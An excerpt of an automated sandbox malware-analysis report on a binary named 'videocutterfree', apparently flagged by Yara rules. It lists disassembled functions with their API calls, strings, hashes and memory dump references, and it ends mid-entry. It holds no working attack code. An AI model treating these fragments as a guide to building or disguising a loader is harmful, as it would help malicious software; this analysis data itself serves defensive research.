                                                                              • Instruction ID: cbdce7c8b6cdee2b53cc101b93e1f0d64f3b1fb330e7dedf1c6bb3ef9c2d3e45
                                                                              • Opcode Fuzzy Hash: 384790d679f6ab9f983f5780f034c15b06af3ee2b5bac9904e05162c20bdfa9d
                                                                              • Instruction Fuzzy Hash: BE319171D04308ABDF20DBE4CC85BADB7BDBF8A324F104219E918EB291E7359D058B90
                                                                              APIs
                                                                              • sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                                                • Part of subcall function 60962F28: sqlite3_log.SQLITE3 ref: 60962F5D
                                                                              • sqlite3_mprintf.SQLITE3 ref: 60963534
                                                                              • sqlite3_blob_open.SQLITE3 ref: 6096358B
                                                                              • sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                                              • sqlite3_malloc.SQLITE3 ref: 609635BB
                                                                              • sqlite3_blob_read.SQLITE3 ref: 60963602
                                                                              • sqlite3_free.SQLITE3 ref: 60963621
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_blob_bytessqlite3_blob_opensqlite3_blob_readsqlite3_blob_reopensqlite3_freesqlite3_logsqlite3_mallocsqlite3_mprintf
                                                                              • String ID:
                                                                              • API String ID: 4276469440-0
                                                                              • Opcode ID: 81f80890dbec9a3991ff68d8cfcbb164f6b4d7f09a97d6cb6c54cb11191f3d09
                                                                              • Instruction ID: 177081cd506585250240414a33056f89eeda992db91a315aff795e5fc91eaf1e
                                                                              • Opcode Fuzzy Hash: 81f80890dbec9a3991ff68d8cfcbb164f6b4d7f09a97d6cb6c54cb11191f3d09
                                                                              • Instruction Fuzzy Hash: C641E5B09087059FDB40DF29C48179EBBE6AF98354F01C87AE898DB354E734D841DB92
                                                                              APIs
                                                                              • sqlite3_value_text.SQLITE3 ref: 6091A240
                                                                              • sqlite3_value_text.SQLITE3 ref: 6091A24E
                                                                              • sqlite3_value_bytes.SQLITE3 ref: 6091A25A
                                                                              • sqlite3_value_text.SQLITE3 ref: 6091A27C
                                                                              Strings
                                                                              • LIKE or GLOB pattern too complex, xrefs: 6091A267
                                                                              • ESCAPE expression must be a single character, xrefs: 6091A293
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_value_text$sqlite3_value_bytes
                                                                              • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                                              • API String ID: 4080917175-264706735
                                                                              • Opcode ID: e5bda90e0e0ba1860c41bc069fb20e3a267b2c9271c0a370806f06164fd47fa4
                                                                              • Instruction ID: 7e7232241edcba55bc41816b79a09feadaac9d75cc2fb544db44a2248cbef301
                                                                              • Opcode Fuzzy Hash: e5bda90e0e0ba1860c41bc069fb20e3a267b2c9271c0a370806f06164fd47fa4
                                                                              • Instruction Fuzzy Hash: A4214C74A182198BCB00DF79C88165EBBF6FF64354B108AA9E864DB344E734DCC6CB95
                                                                              APIs
                                                                                • Part of subcall function 6092506E: sqlite3_log.SQLITE3 ref: 609250AB
                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 609250E7
                                                                              • sqlite3_value_text16.SQLITE3 ref: 60925100
                                                                              • sqlite3_value_text16.SQLITE3 ref: 6092512C
                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 6092513E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_value_text16$sqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                              • String ID: library routine called out of sequence$out of memory
                                                                              • API String ID: 2019783549-3029887290
                                                                              • Opcode ID: bf8b25fefa583efc99e02b0fe9019e927645d1a19242a42ec125398c6bed8d9e
                                                                              • Instruction ID: f6310061860eb79c45c0a7b6efb00bde58ba827c5a391e7df96a4cb3fbc4cfa9
                                                                              • Opcode Fuzzy Hash: bf8b25fefa583efc99e02b0fe9019e927645d1a19242a42ec125398c6bed8d9e
                                                                              • Instruction Fuzzy Hash: 81014C70A083049BDB14AF69C9C170EBBE6BF64248F0488A9EC958F30EE775D8818B51
                                                                              APIs
                                                                              • __init_pointers.LIBCMT ref: 009A4B44
                                                                                • Part of subcall function 009A72B2: RtlEncodePointer.NTDLL(00000000), ref: 009A72B5
                                                                                • Part of subcall function 009A72B2: __initp_misc_winsig.LIBCMT ref: 009A72D0
                                                                                • Part of subcall function 009A72B2: GetModuleHandleW.KERNEL32(kernel32.dll,?,009C02F8,00000008,00000003,009BFCDC,?,00000001), ref: 009A8031
                                                                                • Part of subcall function 009A72B2: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 009A8045
                                                                                • Part of subcall function 009A72B2: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 009A8058
                                                                                • Part of subcall function 009A72B2: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 009A806B
                                                                                • Part of subcall function 009A72B2: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 009A807E
                                                                                • Part of subcall function 009A72B2: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 009A8091
                                                                                • Part of subcall function 009A72B2: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 009A80A4
                                                                                • Part of subcall function 009A72B2: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 009A80B7
                                                                                • Part of subcall function 009A72B2: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 009A80CA
                                                                                • Part of subcall function 009A72B2: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 009A80DD
                                                                                • Part of subcall function 009A72B2: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 009A80F0
                                                                                • Part of subcall function 009A72B2: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 009A8103
                                                                                • Part of subcall function 009A72B2: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 009A8116
                                                                                • Part of subcall function 009A72B2: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 009A8129
                                                                                • Part of subcall function 009A72B2: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 009A813C
                                                                                • Part of subcall function 009A72B2: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 009A814F
                                                                              • __mtinitlocks.LIBCMT ref: 009A4B49
                                                                              • __mtterm.LIBCMT ref: 009A4B52
                                                                                • Part of subcall function 009A4BBA: RtlDeleteCriticalSection.NTDLL(00000000), ref: 009A76E8
                                                                                • Part of subcall function 009A4BBA: _free.LIBCMT ref: 009A76EF
                                                                                • Part of subcall function 009A4BBA: RtlDeleteCriticalSection.NTDLL(009C2978), ref: 009A7711
                                                                              • __calloc_crt.LIBCMT ref: 009A4B77
                                                                              • __initptd.LIBCMT ref: 009A4B99
                                                                              • GetCurrentThreadId.KERNEL32 ref: 009A4BA0
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                              • String ID:
                                                                              • API String ID: 3567560977-0
                                                                              • Opcode ID: de27a49fe1c9c3fe07642617c8bbc5c848f2534c337e27dc9ade7f7f2ca232c6
                                                                              • Instruction ID: 8e568d00ef3032bca114eb010cd40952008fe468f05050c5aaadc6373d7ed7ae
                                                                              • Opcode Fuzzy Hash: de27a49fe1c9c3fe07642617c8bbc5c848f2534c337e27dc9ade7f7f2ca232c6
                                                                              • Instruction Fuzzy Hash: 23F06D3255D75119EA247BB87C0BB4E77C89BC3730B200669F561D50D2FE90C84251E4
                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,009A2223,00000000), ref: 009A228B
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 009A2292
                                                                              • RtlEncodePointer.NTDLL(00000000), ref: 009A229E
                                                                              • RtlDecodePointer.NTDLL(00000001), ref: 009A22BB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                              • String ID: RoInitialize$combase.dll
                                                                              • API String ID: 3489934621-340411864
                                                                              • Opcode ID: 6afa97c929ca7ece74adf845514799e0e0b757c04f2b0cc1d54a11f9a8ef6952
                                                                              • Instruction ID: d46034c22e15ffadab983e0a392311362e262cbcdea9728d8f318b73937f362c
                                                                              • Opcode Fuzzy Hash: 6afa97c929ca7ece74adf845514799e0e0b757c04f2b0cc1d54a11f9a8ef6952
                                                                              • Instruction Fuzzy Hash: 50E01271ABC2009BDB10ABB9ED4DF543A79BB55766F104124F415F51F0CBB8A084AF50
                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,009A2260), ref: 009A2360
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 009A2367
                                                                              • RtlEncodePointer.NTDLL(00000000), ref: 009A2372
                                                                              • RtlDecodePointer.NTDLL(009A2260), ref: 009A238D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                              • String ID: RoUninitialize$combase.dll
                                                                              • API String ID: 3489934621-2819208100
                                                                              • Opcode ID: aeaf825d2fb1f42e630dceb51cbaa590b9745764375d53ae229a97c4c3d60906
                                                                              • Instruction ID: 7c1aed8a6d00b3c8a7941862ecdc16585d4096911fb7bc5487e0518af661e4ef
                                                                              • Opcode Fuzzy Hash: aeaf825d2fb1f42e630dceb51cbaa590b9745764375d53ae229a97c4c3d60906
                                                                              • Instruction Fuzzy Hash: 08E04F7096D2009BDB209BA4AE0DB203A69B741712F110614F108EA1A0CBBC6880AA60
                                                                              APIs
                                                                              • TlsGetValue.KERNEL32(00000029,F3247817,?,?,?,?,00000000,009B5868,000000FF,009A0F7A), ref: 009A0D1A
                                                                              • TlsSetValue.KERNEL32(00000029,009A0F7A,?,?,00000000), ref: 009A0D87
                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009A0DB1
                                                                              • HeapFree.KERNEL32(00000000), ref: 009A0DB4
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: HeapValue$FreeProcess
                                                                              • String ID:
                                                                              • API String ID: 1812714009-0
                                                                              • Opcode ID: fbb2a6f8ebd6e65f33b34ddfb1b08f8dda67d724b4daa3bc4c92fe4d8d41779f
                                                                              • Instruction ID: cefb2055416bbc5a12b4b36bde398d76af9e2496c01b7613b73984e14d5c5927
                                                                              • Opcode Fuzzy Hash: fbb2a6f8ebd6e65f33b34ddfb1b08f8dda67d724b4daa3bc4c92fe4d8d41779f
                                                                              • Instruction Fuzzy Hash: 0451A132A043049FDB20DF69C888B1ABBE9EBC6764F158A59E859972D0D734FC00DBD1
                                                                              APIs
                                                                              • _ValidateScopeTableHandlers.LIBCMT ref: 009B4540
                                                                              • __FindPESection.LIBCMT ref: 009B455A
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FindHandlersScopeSectionTableValidate
                                                                              • String ID:
                                                                              • API String ID: 876702719-0
                                                                              • Opcode ID: 2e2c5ec72cbfde767f571f04c68fe533ed9e283a65e6cfc28cebd581567c7f41
                                                                              • Instruction ID: 2be1250477a4c38611ef6df0504e77fa719807e78ab7ba747765f337c92ce1b0
                                                                              • Opcode Fuzzy Hash: 2e2c5ec72cbfde767f571f04c68fe533ed9e283a65e6cfc28cebd581567c7f41
                                                                              • Instruction Fuzzy Hash: A5A19E71A046158FDF20CF58DA80BE9B7E9FB45320F144669E815E7392E735EC11EBA0
                                                                              APIs
                                                                              • GetStringTypeW.KERNEL32(00000001,004065FC,00000001,00000000,00000103,00000001,00000000,00405395,00200020,00000000,?,00000000,00000000,00000001), ref: 00405D53
                                                                              • GetStringTypeA.KERNEL32(00000000,00000001,004065F8,00000001,?,?,00000000,00000000,00000001), ref: 00405D6D
                                                                              • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00405395,00200020,00000000,?,00000000,00000000,00000001), ref: 00405DA1
                                                                              • MultiByteToWideChar.KERNEL32(00405395,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00405395,00200020,00000000,?,00000000,00000000,00000001), ref: 00405DD9
                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405E2F
                                                                              • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405E41
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: StringType$ByteCharMultiWide
                                                                              • String ID:
                                                                              • API String ID: 3852931651-0
                                                                              • Opcode ID: daa3dcf63f1e56564ae51d5e14e7b71bea8df2a9b7ec04e3cfa92e15852c0a95
                                                                              • Instruction ID: 7a17ef0eda87ec18e3c1f43b4cd4c6119ab283ff4b8c91c6e3e7050aee3f782b
                                                                              • Opcode Fuzzy Hash: daa3dcf63f1e56564ae51d5e14e7b71bea8df2a9b7ec04e3cfa92e15852c0a95
                                                                              • Instruction Fuzzy Hash: 7B416D72540609AFCF219F94DD89AAF3F79EB08750F104536F902F6290C33989619F99
                                                                              APIs
                                                                              • sqlite3_free.SQLITE3(?), ref: 609476DD
                                                                                • Part of subcall function 60904423: sqlite3_mutex_leave.SQLITE3(6090449D,?,?,?,60908270), ref: 60904446
                                                                              • sqlite3_log.SQLITE3 ref: 609498F5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_freesqlite3_logsqlite3_mutex_leave
                                                                              • String ID: List of tree roots: $d$|
                                                                              • API String ID: 3709608969-1164703836
                                                                              • Opcode ID: 316fa83f4dc1e403b3b617744d66ff6f9af545e53e2752a9ff9486d467efffaf
                                                                              • Instruction ID: c91562837ba2d96ae21b52ab8334c840e7cbe23d8154f1acff92b465618a0bd4
                                                                              • Opcode Fuzzy Hash: 316fa83f4dc1e403b3b617744d66ff6f9af545e53e2752a9ff9486d467efffaf
                                                                              • Instruction Fuzzy Hash: 3FE10570A043698BDB22CF18C88179DFBBABF65304F1185D9E858AB251D775DE81CF81
                                                                              APIs
                                                                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00991CB1
                                                                              • CloseHandle.KERNEL32(?), ref: 00991CBA
                                                                              • InterlockedExchangeAdd.KERNEL32(009C6244,00000000), ref: 00991CC6
                                                                              • TerminateThread.KERNEL32(?,00000000), ref: 00991CD4
                                                                              • QueueUserAPC.KERNEL32(00991E7C,?,00000000), ref: 00991CE1
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00991CEC
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
                                                                              • String ID:
                                                                              • API String ID: 1946104331-0
                                                                              • Opcode ID: b0deaa41f8a0657f951840153ab27cca03640370f7618018272b6b8a4fb0a007
                                                                              • Instruction ID: bfbd53aade05b2dd82876b49d49731c9158bd5f33944163fb3f2683bc057d1db
                                                                              • Opcode Fuzzy Hash: b0deaa41f8a0657f951840153ab27cca03640370f7618018272b6b8a4fb0a007
                                                                              • Instruction Fuzzy Hash: 0CF03C36528215AF9B206B9BDE0DD6BBBBCEB85721700431DF56A821A0DB74B8009B61
                                                                              APIs
                                                                                • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                                                • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                                                • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                                                • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                                              • sqlite3_column_int64.SQLITE3 ref: 609600BA
                                                                              • sqlite3_column_text.SQLITE3 ref: 609600EF
                                                                              • sqlite3_free.SQLITE3 ref: 6096029A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_bind_int64sqlite3_column_int64sqlite3_column_textsqlite3_freesqlite3_resetsqlite3_result_error_codesqlite3_step
                                                                              • String ID: e
                                                                              • API String ID: 786425071-4024072794
                                                                              • Opcode ID: 373422d03c3c71c2ddc35291c61dfb2213fd8f263c0b9a30c36f02d650250dc2
                                                                              • Instruction ID: e80500568aa73e744b5c90812a7938b6c4ac38b40afb48beb036dafaf3e7d002
                                                                              • Opcode Fuzzy Hash: 373422d03c3c71c2ddc35291c61dfb2213fd8f263c0b9a30c36f02d650250dc2
                                                                              • Instruction Fuzzy Hash: 6291E270A18609CFDB04CF99C494B9EBBF2BF98314F108529E869AB354D774E885CF91
                                                                              APIs
                                                                              • GetVersionExA.KERNEL32 ref: 00403AB7
                                                                              • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00403AEC
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403B4C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentFileModuleNameVariableVersion
                                                                              • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                              • API String ID: 1385375860-4131005785
                                                                              • Opcode ID: 344249156d110f257b02153e948bbfede2cc9a013a446afb0f69aff2e88163ae
                                                                              • Instruction ID: b9aee79e7de5a56590922bde38e4698e080472a703040a0c31cb791c8daf1122
                                                                              • Opcode Fuzzy Hash: 344249156d110f257b02153e948bbfede2cc9a013a446afb0f69aff2e88163ae
                                                                              • Instruction Fuzzy Hash: EC31E371A512886DEB319A705C45AAA3F7C9B0270DF1440FBD086F52C3E239AB858B29
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_exec
                                                                              • String ID: sqlite_master$sqlite_temp_master$|
                                                                              • API String ID: 2141490097-2247242311
                                                                              • Opcode ID: 0e32379bf9c90bcee3e658b343db186d73978ee403121efd96d42beb4ff38922
                                                                              • Instruction ID: 9143400cfb6dc20a8edc2ca7c04099347fc9d468871a1d2187ae3123f936d49a
                                                                              • Opcode Fuzzy Hash: 0e32379bf9c90bcee3e658b343db186d73978ee403121efd96d42beb4ff38922
                                                                              • Instruction Fuzzy Hash: C551B6B09083289BDB26CF18C885799BBFABF59304F108599E498A7351D775DA84CF41
                                                                              APIs
                                                                              • std::exception::exception.LIBCMT ref: 009A072F
                                                                                • Part of subcall function 009A1283: std::exception::_Copy_str.LIBCMT ref: 009A129C
                                                                                • Part of subcall function 0099FB00: __CxxThrowException@8.LIBCMT ref: 0099FB5E
                                                                              • std::exception::exception.LIBCMT ref: 009A078E
                                                                              Strings
                                                                              • boost unique_lock owns already the mutex, xrefs: 009A077D
                                                                              • $, xrefs: 009A0793
                                                                              • boost unique_lock has no mutex, xrefs: 009A071E
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
                                                                              • String ID: $$boost unique_lock has no mutex$boost unique_lock owns already the mutex
                                                                              • API String ID: 2140441600-46888669
                                                                              • Opcode ID: 0c25f1de33fd6ecdeaa310044b722a6273e904094d8a89e51b9a464e75cc9397
                                                                              • Instruction ID: a966e4e5454b1c71c8a6b0b4d1675b8ad8ec555ce8f2ab91e844b913af4e9db4
                                                                              • Opcode Fuzzy Hash: 0c25f1de33fd6ecdeaa310044b722a6273e904094d8a89e51b9a464e75cc9397
                                                                              • Instruction Fuzzy Hash: 922106B180C3809FD720DF29C55575BBBE4BBC9718F404A1EF8A587281D7B5D408CB92
                                                                              APIs
                                                                              • __getptd_noexit.LIBCMT ref: 009A3830
                                                                                • Part of subcall function 009A4A22: GetLastError.KERNEL32(75920A60,7591F550,009A4C10,009A1DE3,7591F550,?,009958EA,00000104,75920A60,7591F550,ntdll.dll,?,?,?,00995D00), ref: 009A4A24
                                                                                • Part of subcall function 009A4A22: __calloc_crt.LIBCMT ref: 009A4A45
                                                                                • Part of subcall function 009A4A22: __initptd.LIBCMT ref: 009A4A67
                                                                                • Part of subcall function 009A4A22: GetCurrentThreadId.KERNEL32 ref: 009A4A6E
                                                                                • Part of subcall function 009A4A22: SetLastError.KERNEL32(00000000,009958EA,00000104,75920A60,7591F550,ntdll.dll,?,?,?,00995D00), ref: 009A4A86
                                                                              • __calloc_crt.LIBCMT ref: 009A3853
                                                                              • __get_sys_err_msg.LIBCMT ref: 009A3871
                                                                              • __invoke_watson.LIBCMT ref: 009A388E
                                                                              Strings
                                                                              • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 009A383B, 009A3861
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast__calloc_crt$CurrentThread__get_sys_err_msg__getptd_noexit__initptd__invoke_watson
                                                                              • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                              • API String ID: 109275364-798102604
                                                                              • Opcode ID: 96c035aef47aae1e660ce74d2f075588948d7d54e5f037e43fbfddade829d910
                                                                              • Instruction ID: 34280554af775964f0c2a542994f816c41b7aceb11f81ca11b830f6d680a28b2
                                                                              • Opcode Fuzzy Hash: 96c035aef47aae1e660ce74d2f075588948d7d54e5f037e43fbfddade829d910
